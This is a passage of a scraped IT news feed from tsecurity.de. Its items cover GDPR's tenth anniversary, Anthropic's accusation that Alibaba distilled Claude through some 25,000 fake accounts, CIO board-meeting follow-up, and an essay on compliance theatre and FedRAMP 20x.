<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ten years have passed since the <a href="https://www.csoonline.com/article/562107/general-data-protection-regulation-gdpr-requirements-deadlines-and-facts.html">General Data Protection Regulation (GDPR)</a> came into force, and the results are mixed. While data protection has become more firmly established in European companies — and beyond — than ever before, the business world remains critical of the regulation due to increasing bureaucracy, legal uncertainty, and competitive disadvantages.</p>



<p>From a data protection perspective, this is a success story. <a href="https://www.bitkom.org/sites/main/files/2026-05/bitkom-zeitreihe-ds-gvo-final.pdf" target="_blank" rel="noreferrer noopener">According to a 2018 Bitkom study</a>, shortly before GDPR came into effect that year, only 7% of German companies had fully or largely implemented the requirements. Six years later, 71% of German companies said they had done so.</p>



<p>Furthermore, GDPR has significantly increased awareness of the protection of personal data — both among companies and consumers. Customers are paying closer attention to transparency, consent, and data security. For many companies, data protection has now become a competitive factor in building customer trust.</p>



<p>At the same time, record fines against data giants such as <a href="https://www.csoonline.com/article/567531/the-biggest-data-breach-fines-penalties-and-settlements-so-far.html">Meta, TikTok, and Uber</a> show that the GDPR is serious business, with the total amount of publicly known GDPR fines having exceeded €6 billion for the first time in March 2026. Still, <a href="https://www.csoonline.com/article/4178001/gdpr-set-the-tone-for-regulatory-action-and-the-ai-fine-pushback-to-come.html">just 60% of fines have been paid to date</a>, with other fines having been annulled or remaining under appeal.</p>



<p>Also, according to law firm CMS, there has been a clear shift in focus for GDPR enforcement: Supervisory authorities are increasingly concentrating on practical compliance issues and less on isolated, high-profile cases. What began with landmark proceedings and record fines has now evolved into a routine, operational review of companies’ day-to-day data protection practices.</p>



<h2 class="wp-block-heading">Companies complain of increasing burden</h2>



<p>At the same time, dissatisfaction within the business community is increasing. What was originally intended to provide greater legal certainty and uniform rules across Europe is now perceived by many companies as a constant burden.</p>



<p>In a Bitkom survey from 2025, 81% of companies surveyed stated that the GDPR was making their business processes more complicated. In 2016, only 25% held this view. By 2025, 97% rated the effort required as high, with 44% rating it as very high.</p>



<p>There are many reasons for this discontent. Four out of five companies surveyed (82%) by Bitkom cited uncertainty regarding the precise data protection regulations as a challenge in 2025. At the same time, 86% believe that implementation is never truly complete because companies must continuously react to technical and legal developments. Data protection is thus perceived as a particularly challenging, ongoing compliance task.</p>



<h2 class="wp-block-heading">AI: GDPR’s new test</h2>



<p>Data-driven projects are particularly affected. In 2025, 59% of study participants reported that the development of data pools had failed or not even been initiated due to data protection regulations. The figures remain high for data analysis tools, AI applications, and the digitization of business processes as well. Data protection regulations are thus perceived as a hurdle primarily where — as is particularly the case with AI — innovations depend on large volumes of data.</p>



<p>The result: According to Bitkom, 59% of companies see European data protection as an advantage for AI development in Germany and Europe compared to other countries. In practice, however, they experience the opposite. For example, in 2025, 69% of respondents stated that data protection makes it difficult to train AI models with sufficient data.</p>



<p>“The reality is: AI is not being developed in Europe because of our data protection practices, but the models are still being used here,” commented Bitkom President Ralf Wintergerst on the findings. “This means nothing is gained for the protection of European citizens’ data, but much is lost for Europe as a business location.”</p>



<p>Bitkom is therefore calling for a reform that strengthens data protection where real risks to people arise — and relieves companies of the burden where formal obligations offer no additional protection. Specifically, this means a consistent risk-oriented approach to the GDPR and a unified understanding that the training and operation of AI systems must also be possible in Europe, says Wintergerst.</p>



<p>Whether the industry association’s demand for a relaxation of data protection standards in favor of technological competitiveness is also in the interest of consumers is another matter. What is certain is that the GDPR has not lost its relevance even 10 years after its entry into force (or eight years since its application).</p>



<p>Or, as lawyer <a href="https://cms.law/de/deu/personen/anna-lena-fuellsack" target="_blank" rel="noreferrer noopener">Anna Lena Füllsack</a> from CMS puts it: “The enforcement of the GDPR has outgrown its infancy and is now an integral part of the regular legal landscape throughout Europe. For companies, it will remain a key strategic issue in the coming years.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sharing SBOMs Securely Without Giving Too Much Away]]></title>
<description><![CDATA[SBOMs Create Transparency, But Not Without Risk The Software Bill of Materials, or SBOM, has changed meaning in recent years. It used to be seen as a technical tool for internal inventory management. It is now required as evidence due…
Read more →
The post Sharing SBOMs Securely Without Giving To...]]></description>
<link>https://tsecurity.de/de/3625557/it-security-nachrichten/sharing-sboms-securely-without-giving-too-much-away/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625557/it-security-nachrichten/sharing-sboms-securely-without-giving-too-much-away/</guid>
<pubDate>Thu, 25 Jun 2026 20:09:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>SBOMs Create Transparency, But Not Without Risk The Software Bill of Materials, or SBOM, has changed meaning in recent years. It used to be seen as a technical tool for internal inventory management. It is now required as evidence due…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/sharing-sboms-securely-without-giving-too-much-away/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/sharing-sboms-securely-without-giving-too-much-away/">Sharing SBOMs Securely Without Giving Too Much Away</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw powers $99 mini PC but it's an AI agentic trap wrapped in Windows 11, delivered with a CPU from 2011 - choose a refurbished PC instead]]></title>
<description><![CDATA[It's not exactly a deal when you look closely at the details]]></description>
<link>https://tsecurity.de/de/3624462/it-nachrichten/openclaw-powers-99-mini-pc-but-its-an-ai-agentic-trap-wrapped-in-windows-11-delivered-with-a-cpu-from-2011-choose-a-refurbished-pc-instead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624462/it-nachrichten/openclaw-powers-99-mini-pc-but-its-an-ai-agentic-trap-wrapped-in-windows-11-delivered-with-a-cpu-from-2011-choose-a-refurbished-pc-instead/</guid>
<pubDate>Thu, 25 Jun 2026 14:17:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's not exactly a deal when you look closely at the details]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic accuses Alibaba of using 25,000 fake accounts to scrape Claude AI]]></title>
<description><![CDATA[Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.



The campaign, carried out between April 22 and June 5, generated more than 28.8 mi...]]></description>
<link>https://tsecurity.de/de/3624147/ai-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624147/ai-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</guid>
<pubDate>Thu, 25 Jun 2026 12:48:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.</p>



<p>The campaign, carried out between April 22 and June 5, generated more than 28.8 million exchanges with Claude, according to a June 10 letter Anthropic sent to senior members of the US Senate Banking Committee, <a href="https://www.reuters.com/world/china/anthropic-says-alibaba-illicitly-extracted-claude-ai-model-capabilities-2026-06-24/" target="_blank" rel="noreferrer noopener">Reuters reported</a>.</p>



<p>Anthropic said the effort involved “distillation,” a technique in which a less capable AI model is trained on the outputs of a more advanced system, potentially allowing rivals to replicate some of its capabilities at lower cost.</p>



<p>The company said the campaign was conducted by operators affiliated with Alibaba and Alibaba Qwen, Alibaba’s AI lab, according to the report.</p>



<p>The allegation comes as businesses adopt generative AI tools across business functions, putting pressure on vendors to show they can detect misuse while keeping services available for corporate customers.</p>



<p>The dispute also comes as AI development becomes more closely tied to <a href="https://www.computerworld.com/article/4149313/chinas-use-of-open%E2%80%91source-ai-threatens-the-us-lead-in-ai-development-us-commission-warns.html">US-China technology tensions</a>. Anthropic said the alleged campaign could help accelerate China’s ability to reach the capabilities of its advanced <a href="https://www.computerworld.com/article/4162278/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox-3.html">Mythos Preview</a> model, while US officials have stepped up scrutiny of advanced AI systems over fears they could be used by military or intelligence users in countries of concern.</p>



<p>In February, Anthropic said it had identified similar campaigns by DeepSeek, Moonshot AI, and MiniMax to extract capabilities from Claude, with the alleged activity ranging from more than 150,000 exchanges by DeepSeek to more than 13 million by MiniMax.</p>



<p>Alibaba did not immediately respond to a request for comment.</p>



<h2 class="wp-block-heading">A new supply chain risk</h2>



<p>If Anthropic’s claims are true, the alleged campaign could allow Alibaba to build a comparable model in a short period of time and offer it at a much lower cost, said <a href="https://www.techinsights.com/experts/Anand-Joshi" target="_blank" rel="noreferrer noopener">Anand Joshi</a>, an AI analyst at TechInsights.</p>



<p>Analysts said the alleged campaign also points to a broader pattern beyond the two companies. Viewed alongside previous incidents cited by Anthropic, they said, model extraction appears to be escalating rather than remaining an isolated risk.</p>



<p>“The enterprise supply chain no longer ends at software, APIs, and cloud regions,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “It now includes rented intelligence, and rented intelligence can be copied and redeployed well outside the safety controls it was born with.”</p>



<p>Gogia said distillation should be a board-level concern because a weaker model trained on a stronger one can inherit its capabilities without the governance and controls around the original system.</p>



<p>For enterprises, the allegations point to a potentially more serious risk than conventional intellectual property theft: reverse engineering at scale. If proven, they would suggest that AI models can be copied systematically, turning model extraction into a new AI supply-chain risk.</p>



<p>“If a rival can clone the exact brain of the AI your company relies on, they can easily find its blind spots, hack your automated systems, or cause the AI vendor to panic and shut down services that your business needs to run every day,” said <a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting.</p>



<h2 class="wp-block-heading">Mitigating the risks</h2>



<p><br>The allegation raises questions about the controls AI vendors have in place and how customers can protect themselves.</p>



<p>“Vendors should provide verified accounts, smart rate limits, abuse detection, usage monitoring, contractual bans on distillation, incident disclosure, and audit rights,” Jain said. “Enterprises should ask how the vendor detects and blocks large-scale model extraction and can demand contracts that guarantee backup plans and financial refunds if the AI service gets attacked or suddenly shut down.”</p>



<p>Joshi said enterprise customers should also press vendors for greater transparency around model development and safeguards.</p>



<p>“Enterprise buyers should ask what training data was used, how it was trained, what guardrails exist, how they can audit it, and so on,” Joshi said. “Model publishers will have to come up with watermarking technology in models as well as model responses. So if the model ‘skills’ are stolen, they should be able to find the thief.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic accuses Alibaba of using 25,000 fake accounts to scrape Claude AI]]></title>
<description><![CDATA[Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.



The campaign, carried out between April 22 and June 5, generated more than 28.8 mi...]]></description>
<link>https://tsecurity.de/de/3624110/it-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624110/it-nachrichten/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai/</guid>
<pubDate>Thu, 25 Jun 2026 12:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Anthropic has accused Alibaba of using nearly 25,000 fraudulent accounts to extract capabilities from its Claude AI models, in what the US AI company described as the largest known attack of its kind against it.</p>



<p>The campaign, carried out between April 22 and June 5, generated more than 28.8 million exchanges with Claude, according to a June 10 letter Anthropic sent to senior members of the US Senate Banking Committee, <a href="https://www.reuters.com/world/china/anthropic-says-alibaba-illicitly-extracted-claude-ai-model-capabilities-2026-06-24/" target="_blank" rel="noreferrer noopener">Reuters reported</a>.</p>



<p>Anthropic said the effort involved “distillation,” a technique in which a less capable AI model is trained on the outputs of a more advanced system, potentially allowing rivals to replicate some of its capabilities at lower cost.</p>



<p>The company said the campaign was conducted by operators affiliated with Alibaba and Alibaba Qwen, Alibaba’s AI lab, according to the report.</p>



<p>The allegation comes as businesses adopt generative AI tools across business functions, putting pressure on vendors to show they can detect misuse while keeping services available for corporate customers.</p>



<p>The dispute also comes as AI development becomes more closely tied to <a href="https://www.computerworld.com/article/4149313/chinas-use-of-open%E2%80%91source-ai-threatens-the-us-lead-in-ai-development-us-commission-warns.html">US-China technology tensions</a>. Anthropic said the alleged campaign could help accelerate China’s ability to reach the capabilities of its advanced <a href="https://www.computerworld.com/article/4162278/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox-3.html">Mythos Preview</a> model, while US officials have stepped up scrutiny of advanced AI systems over fears they could be used by military or intelligence users in countries of concern.</p>



<p>In February, Anthropic said it had identified similar campaigns by DeepSeek, Moonshot AI, and MiniMax to extract capabilities from Claude, with the alleged activity ranging from more than 150,000 exchanges by DeepSeek to more than 13 million by MiniMax.</p>



<p>Alibaba did not immediately respond to a request for comment.</p>



<h2 class="wp-block-heading">A new supply chain risk</h2>



<p>If Anthropic’s claims are true, the alleged campaign could allow Alibaba to build a comparable model in a short period of time and offer it at a much lower cost, said <a href="https://www.techinsights.com/experts/Anand-Joshi" target="_blank" rel="noreferrer noopener">Anand Joshi</a>, an AI analyst at TechInsights.</p>



<p>Analysts said the alleged campaign also points to a broader pattern beyond the two companies. Viewed alongside previous incidents cited by Anthropic, they said, model extraction appears to be escalating rather than remaining an isolated risk.</p>



<p>“The enterprise supply chain no longer ends at software, APIs, and cloud regions,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “It now includes rented intelligence, and rented intelligence can be copied and redeployed well outside the safety controls it was born with.”</p>



<p>Gogia said distillation should be a board-level concern because a weaker model trained on a stronger one can inherit its capabilities without the governance and controls around the original system.</p>



<p>For enterprises, the allegations point to a potentially more serious risk than conventional intellectual property theft: reverse engineering at scale. If proven, they would suggest that AI models can be copied systematically, turning model extraction into a new AI supply-chain risk.</p>



<p>“If a rival can clone the exact brain of the AI your company relies on, they can easily find its blind spots, hack your automated systems, or cause the AI vendor to panic and shut down services that your business needs to run every day,” said <a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting.</p>



<h2 class="wp-block-heading">Mitigating the risks</h2>



<p><br>The allegation raises questions about the controls AI vendors have in place and how customers can protect themselves.</p>



<p>“Vendors should provide verified accounts, smart rate limits, abuse detection, usage monitoring, contractual bans on distillation, incident disclosure, and audit rights,” Jain said. “Enterprises should ask how the vendor detects and blocks large-scale model extraction and can demand contracts that guarantee backup plans and financial refunds if the AI service gets attacked or suddenly shut down.”</p>



<p>Joshi said enterprise customers should also press vendors for greater transparency around model development and safeguards.</p>



<p>“Enterprise buyers should ask what training data was used, how it was trained, what guardrails exist, how they can audit it, and so on,” Joshi said. “Model publishers will have to come up with watermarking technology in models as well as model responses. So if the model ‘skills’ are stolen, they should be able to find the thief.”</p>



<p><em>The article originally appeared on <a href="https://www.infoworld.com/article/4189342/anthropic-accuses-alibaba-of-using-25000-fake-accounts-to-scrape-claude-ai.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What CIOs must do after the board meeting]]></title>
<description><![CDATA[Ahead of board meetings, CIOs refine slides, rehearse talking points, anticipate questions, and align with the executive team. Then they walk in, deliver their presentation, answer a few questions, and breathe a sigh of relief when it’s over.



The problem, according to several experienced CIOs-...]]></description>
<link>https://tsecurity.de/de/3624013/it-nachrichten/what-cios-must-do-after-the-board-meeting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624013/it-nachrichten/what-cios-must-do-after-the-board-meeting/</guid>
<pubDate>Thu, 25 Jun 2026 12:02:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ahead of board meetings, CIOs refine slides, rehearse talking points, anticipate questions, and align with the executive team. Then they walk in, deliver their presentation, answer a few questions, and breathe a sigh of relief when it’s over.</p>



<p>The problem, according to several experienced CIOs-turned-board-directors, is that many tech leaders treat the board meeting as a discrete event rather than part of a relationship.</p>



<p>“The board meeting is an ongoing dialogue, not an event,” says Ron Guerrier, CTO of Save the Children who’s sat on or advised several boards.</p>



<p>That mindset shift becomes increasingly important as boards dig deeper on issues like cyber risk, AI governance, and major enterprise initiatives. So while CIOs often focus on the presentation itself, experienced boardroom veterans say what happens after can be just as critical.</p>



<h2 class="wp-block-heading">Keep the conversation going</h2>



<p>One of the biggest mistakes CIOs make is viewing board engagement as a quarterly obligation. Once the meeting ends, they return to their day jobs and wait for the next board cycle to begin. For Guerrier, that misses the point.</p>



<p>The strongest <a href="https://www.cio.com/article/4149185/the-inside-track-on-how-boards-evaluate-their-cios.html?utm=hybrid_search">CIO-board relationships</a> are built over time through a series of conversations, not quarterly presentations. Questions raised during a board meeting shouldn’t disappear into the next reporting cycle. Instead, CIOs should view them as signals about what directors prioritize and where future conversations should focus.</p>



<p>That doesn’t mean bombarding directors with updates, though. It means remaining engaged, responsive, and thoughtful between meetings. The most effective CIOs understand that every board interaction contributes to a broader relationship built on trust and credibility.</p>



<h2 class="wp-block-heading">Reflect before you react</h2>



<p>The instinct after a board meeting is often to move immediately to follow-up actions, answer outstanding questions, and get back to the daily demands of running IT.</p>



<p>CIOs should resist that urge, says Sigal Zarmi, former CIO and current public-company board director. “The most important thing is to step back and think what resonated with the board,” she says. “What were the questions, what really piqued their interests, and what’s the board focusing on.”</p>



<p>Board questions often provide insight into the main things directors care about, whether it’s innovation, cyber risk, AI, operational resilience, or broader business transformation efforts. Understanding those priorities can help CIOs shape future conversations and align their messaging.</p>



<p>According to Zarmi, many technology leaders leave valuable insights on the table because they become overly focused on their content rather than on engaging the board.</p>



<p>“A lot of people presenting think the board needs to know all the details in the world,” she says. “They come with heavy decks and a lot of data the board can’t comprehend.”</p>



<p>Instead, she encourages CIOs to focus on narrative and business impact. “What’s most important is really to tell the story of what you’re doing, why you’re doing it, and the impact on the business.”</p>



<h2 class="wp-block-heading">Follow-up isn’t housekeeping, it’s leadership</h2>



<p>Wayne Shurts, former CTO of Sysco and current board member and advisor, believes many CIOs overlook one of the most valuable aspects of board engagement: access to experienced executives who can help them think differently.</p>



<p>“It really begins before the board meeting,” he says.</p>



<p>Long before a CIO walks into the boardroom, Shurts recommends building relationships with directors whose backgrounds align with the issues tech leaders are likely to discuss. Those conversations can provide valuable insight into board priorities, concerns, and expectations. “Try to get a feel for the audience before you walk in there and present, which is just basic, but not enough people do it,” he says.</p>



<p>The same philosophy applies after the meeting ends. If directors raise questions that can’t be fully addressed during the meeting, Shurts recommends following up rather than waiting for the next quarterly cycle. More importantly, he believes CIOs often underestimate how much value they can gain from the board itself.</p>



<p>“Sometimes boards are really helpful,” he says. “They might have given you some valuable information that can make things go better.”</p>



<p>Too many CIOs interpret tough questions as criticism, though. But experienced board members often see them as opportunities to challenge assumptions, improve decision-making, and strengthen outcomes. The same principle applies when discussing major initiatives since directors evaluate the leadership team’s alignment around business priorities, rather than the CIO in particular.</p>



<p>“There are very few, if any, IT projects that aren’t business projects,” says Shurts.</p>



<p>No matter what the topic, boards want to see evidence that technology investments are supported across the business and understood by the leaders accountable for delivering results.</p>



<h2 class="wp-block-heading">Ask what happened after you left the room</h2>



<p>One of the most overlooked opportunities comes after the presentation ends and the CIO leaves the discussion. Many IT leaders debrief with their CEO, general counsel, or executive team. Far fewer seek feedback from trusted directors. Shurts believes they should.</p>



<p>After significant board interactions, he recommends reaching out to directors with whom a relationship already exists and simply ask, “How’d that go? How did I do?”</p>



<p>Good directors can provide valuable perspective on how the discussion landed, what concerns surfaced during subsequent conversations, and whether there were issues that deserve additional attention. Those conversations can reveal concerns that never surfaced publicly during the meeting. They can also identify opportunities to improve future interactions, strengthen relationships, and better understand how directors think about technology issues.</p>



<p>For Zarmi, the final lesson is transparency. Any communication with directors after a meeting should remain aligned with the CEO and broader leadership team. CIOs may own the technology strategy, but they’re still operating within a larger enterprise context.</p>



<p>“Always follow up with the CEO,” she says. “’Here’s what I presented. What do you think and how can I be more effective?’”</p>



<p>That discipline becomes especially important when directors ask follow-up questions. While a CIO may be tempted to respond tactically, Zarmi argues that leaders must first consider how their answer fits into the broader business narrative since CIOs need to think about the role they play in the big picture, she adds.</p>



<p>As Shurts puts it, “Boards are over-presented to, and under-dialogued with.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GRC is broken. FedRAMP 20x might fix it]]></title>
<description><![CDATA[We are auditing a curated version of history.



I’ve worked in security long enough now to know something most of us don’t really say out loud. A lot of compliance is theatre. Not all of it, and not all auditors or frameworks, but enough of it that most experienced CISOs know exactly what I mean...]]></description>
<link>https://tsecurity.de/de/3623890/it-security-nachrichten/grc-is-broken-fedramp-20x-might-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623890/it-security-nachrichten/grc-is-broken-fedramp-20x-might-fix-it/</guid>
<pubDate>Thu, 25 Jun 2026 11:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>We are auditing a curated version of history.</p>



<p>I’ve worked in security long enough now to know something most of us don’t really say out loud. A lot of compliance is theatre. Not all of it, and not all auditors or frameworks, but enough of it that most experienced CISOs know exactly what I mean. If you understand how audits work, know how controls are interpreted and can manage scope and narrative well enough, you can often steer things where you need them to go.</p>



<p>That’s uncomfortable to admit, but it’s true. The market now treats things like SOC 2 and ISO 27001 as direct statements about operational maturity and security posture when they really aren’t. They are snapshots. Point-in-time reviews based on selected evidence and sampled testing. That doesn’t make them useless. These frameworks were built for a completely different world where cloud infrastructure was less dynamic, APIs weren’t everywhere and continuous telemetry at scale simply wasn’t realistic. Sampling existed because there wasn’t much of an alternative. That’s before we even mention AI, where technology now changes on a monthly cadence against a regulatory backdrop that speaks in years.</p>



<p>The issue is that the world moved on, but assurance largely didn’t. The team behind  <a href="https://www.fedramp.gov/20x">FedRAMP 20x</a> are attempting to address exactly that problem, pushing assurance towards automation, machine-readable evidence and continuous validation rather than documentation-heavy compliance exercises. Most compliance programs still revolve around screenshots, exported evidence, manually curated narratives and carefully staged representations of reality. And that word, reality, is the important bit because in many cases, we are not auditing reality at all. We are auditing a curated version of history.</p>



<p>That’s why one of the most important things I’ve heard said around FedRAMP 20x is this: <strong>Passing audits does not equal security</strong>.</p>



<p>Exactly. A company can pass an audit while engineers bypass processes every Friday night to hit deadlines. Controls can drift quietly over time while nobody notices because the evidence only exists for a specific audit window. The audit passes because the story passes, and honestly, I think that’s the bit the industry is becoming increasingly uncomfortable with. How many times a year is the production push made as a “hot fix”?</p>



<p>And honestly, I think that’s why movements like GRC engineering are getting so much traction. Not because people suddenly wanted a trendy new title for compliance. But because there’s growing frustration with how artificial parts of the industry have become.</p>



<p>A few months ago, I gave a talk in Seattle comparing the rise of GRC engineering to the rise of grunge music. I’m a huge Nirvana fan, so maybe the analogy was inevitable, but the more I thought about it, the more it made sense. Grunge didn’t emerge because people desperately wanted something shiny and new. It emerged because people stopped believing the polished version was real. Hair metal had become overproduced and performative. Grunge felt rough around the edges, but it also felt honest.</p>



<p>That’s exactly where GRC feels like it is right now. Too much compliance has become about presenting the cleanest possible version of reality instead of exposing operational truth. Too many clean reports. Too many green ticks on trust centers. Too many perfect policies.</p>



<h2 class="wp-block-heading">The sat nav problem</h2>



<p>Which brings me to one of the dumbest weekends of my life.</p>



<p>Many years ago, my wife decided she wanted to go glamping in the Lake District for Valentine’s Day.</p>



<p>We drove north through classic, miserable British weather in a tiny little car completely unsuited for what was coming.</p>



<p>As we got closer to the Lakes, the rain slowly turned into heavy snow.</p>



<p>Then a full blizzard.</p>



<p>The sat nav confidently directed us up a tiny snow-covered road that we physically could not drive up.</p>



<p>We got stuck.</p>



<p>Eventually, we got free.</p>



<p>The sat nav recalculated and sent us up another equally impossible road.</p>



<p>Same outcome.</p>



<p>This happened multiple times until we eventually ended up buried in a snow drift somewhere in the middle of nowhere, waiting for a bloke in a 4×4 to rescue us while trying not to laugh too hard at the idiots in the tiny car.</p>



<p>After about seventeen hours of driving, we gave up and drove home.</p>



<p>Completely failed Valentine’s trip.</p>



<p>But honestly, I think about that weekend a lot when I think about GRC because the sat nav had data. What it lacked was context. It didn’t understand the environment, the conditions, the capability of the vehicle or even the actual outcome we were trying to achieve. We became obsessed with following the prescribed route instead of stepping back and asking whether the route itself still made sense. It reminds me of stories like tourists literally driving into the sea while blindly following GPS directions. The problem wasn’t the absence of data. The problem was understanding the context around the data.  Tourists drive into sea following GPS directions.</p>



<p>A lot of compliance programs behave the same way. The objective quietly becomes “pass the audit” instead of “reduce meaningful risk”, and once that happens, teams start optimising for the framework rather than the security outcome. That’s the shift I think FedRAMP 20x and the broader GRC engineering movement are trying to force. Not just better automation or more integrations, but a fundamentally different way of thinking about trust.</p>



<h2 class="wp-block-heading">Compliance becomes an engineering problem</h2>



<p>One of the central ideas behind FedRAMP 20x is that assurance increasingly needs to be treated as an engineering challenge rather than a documentation exercise.</p>



<p>Historically, most compliance has been based on samples. Sampled pull requests, sampled access reviews and sampled infrastructure evidence. FedRAMP 20x pushes in a very different direction with machine-readable evidence, APIs, telemetry and complete datasets instead of manually curated snapshots. Many of these principles closely mirror those outlined in the <a href="https://grc.engineering/">GRC Engineering Manifesto</a>, which argues that modern assurance should be built on automation, telemetry and engineering disciplines rather than static evidence collection.</p>



<p>One of the biggest mindset shifts for our engineering teams was realising FedRAMP wasn’t really asking for selected evidence anymore. They wanted the underlying operational data itself. Not a screenshot proving something was configured correctly on one specific day, but the actual flow of telemetry that underpinned the control or assurance statement. That’s a completely different way of thinking about compliance because the conversation moves away from “prove this existed once” and towards “show me the operational reality continuously.”</p>



<p>Instead of showing a screenshot proving a virtual machine was configured correctly on one day, you expose every VM in the environment alongside drift data over time.</p>



<p>Instead of selecting a handful of GitHub pull requests, you expose the entire development workflow, including the messy bits where processes were bypassed.</p>



<p>Instead of showing sampled JML evidence, you expose the full lifecycle history of identity management over years.</p>



<p>Honestly, it should feel uncomfortable because that discomfort is probably a sign you’re finally exposing operational truth instead of polishing it away. Trust shouldn’t come from perfection. It should come from transparency.</p>



<h2 class="wp-block-heading">We thought we were ready</h2>



<p>And honestly, that’s exactly why our own FedRAMP 20x journey became so interesting.</p>



<p>We originally planned to move towards moderate through a much longer runway. Then the programme timings changed, government shutdowns caused disruption, and suddenly we found ourselves with around six or seven weeks before audit activity started.</p>



<p>We thought we had a solid plan.</p>



<p>We didn’t.</p>



<p>Or at least not one that was mature enough yet.</p>



<p>We had missed the low pilot earlier in the journey and entered the moderate phase without having already gone through that foundational learning process. We were also the only organization in our pilot group that hadn’t already completed the low pathway first.</p>



<p>That mattered.</p>



<p>We didn’t yet have the operational muscle memory.</p>



<p>No established playbook.<br>No previous iteration.<br>No deeply embedded understanding of how this model actually behaved in practice.</p>



<p>At the same time, we weren’t trying to approach FedRAMP 20x like traditional compliance.</p>



<p>We built direct API connectivity that allowed FedRAMP and auditors to pull complete machine-readable datasets in JSON format directly from the platform. Human-readable exports still existed where required, but the focus was on exposing operational truth rather than curating static evidence.</p>



<p>That’s also one of the core principles behind FedRAMP 20x itself. Controls increasingly need to be both machine-readable and human-readable. The baseline expectation is that a large percentage of controls should be automated with continuous evidence flowing behind them instead of static evidence being manually assembled before an audit.</p>



<p>What that means in practice is that auditors no longer just review a point-in-time evidence pack. They gain ongoing visibility into operational datasets and can interrogate those environments in a much more dynamic way.</p>



<p>That’s a very different mindset from traditional compliance.</p>



<p>And honestly, I think that difference is part of what made the journey so valuable.</p>



<h2 class="wp-block-heading">We didn’t fail. We iterated</h2>



<p>Because I don’t actually think what happened next was failure.</p>



<p>I think it was iteration.</p>



<p>Modern engineering teams don’t release perfect software on day one. They test, rebuild, refactor, improve and iterate continuously based on telemetry and feedback.</p>



<p>Applications go through:</p>



<ul class="wp-block-list">
<li>Testing</li>



<li>User feedback</li>



<li>Redesign</li>



<li>Bug fixing</li>



<li>Telemetry analysis</li>



<li>Continuous improvement</li>
</ul>



<p>Nobody expects version one to be perfect.</p>



<p>Yet historically, GRC has behaved completely differently.</p>



<p>Build the controls.<br>Collect the evidence.<br>Pass the audit.<br>Repeat next year.</p>



